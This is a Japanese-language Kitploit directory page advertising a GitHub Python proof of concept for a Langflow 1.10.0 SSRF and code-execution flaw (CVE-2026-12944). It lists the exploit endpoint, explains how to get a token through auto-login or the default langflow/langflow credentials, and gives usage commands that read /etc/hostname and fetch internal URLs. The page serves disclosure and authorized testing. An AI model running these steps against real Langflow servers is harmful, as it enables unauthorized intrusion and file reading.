Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-12944 — Python PoCは、カスタムコンポーネント内のurllibを介したLangflow 1.10.0のSSRFであるCVE-2026-12944を悪用し、認証済みの読み取りおよびフェッチ機能を備えています。 | Kitploit
ツール/GitHubGitHub/shadowforge-cyber/cve-2026-12944
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストAPIセキュリティ
GitHubshadowforge-cyber/cve-2026-12944

CVE-2026-12944

Python PoCは、カスタムコンポーネント内のurllibを介したLangflow 1.10.0のSSRFであるCVE-2026-12944を悪用し、認証済みの読み取りおよびフェッチ機能を備えています。

リポジトリを見る
19時間28分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-12944: Langflow 1.10.0 — urllib SSRF

Langflow OSS (≤ 1.10.0) — カスタムコンポーネント内の urllib.request / socket を介した任意コード実行を可能にする脆弱性。
コンポーネントスキャナーの拒否リストはこれらの標準ライブラリモジュールを検出できなかった。1.10.1 で修正済み (IBM)。

深刻度: PR:L (公開再現可能 / 低深刻度)

エクスプロイトエンドポイント: POST /api/v1/custom_component
セッション Cookie またはベアラートークンが必要。

認証済みアクセスを取得する方法 (簡単な3つのパス)

  1. --test — 認証不要。公開されている GET /api/v1/version のみを実行する。
  2. --read / --fetch — まず認証を行う:
    • 自動ログイン有効 (標準の Langflow ではデフォルトで有効):
      GET /api/v1/auto_login。JSON レスポンスに が含まれている場合、 を送信する (ユーザー名/パスワードは不要)。
access_token
Authorization: Bearer …
  • 自動ログイン無効:
    application/x-www-form-urlencoded 形式で --uname / --password を使用して POST /api/v1/login を実行する。
  • ログイン後、ペイロードを POST /api/v1/custom_component に送信する。
  • --uname / --password は自動ログインが無効な場合にのみ使用される。デフォルトの標準インストールでは無視される。

    認可されたテスト専用。 所有していない、または明示的なテスト許可を得ていないシステムに対してこれを使用しないこと。

    要件: Python 3 (標準ライブラリのみ)。

    使用例

    root@kitploit:~
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
    

    クレジット

    レポート & PoC: ShadowForge Cyber

    ツールをダウンロード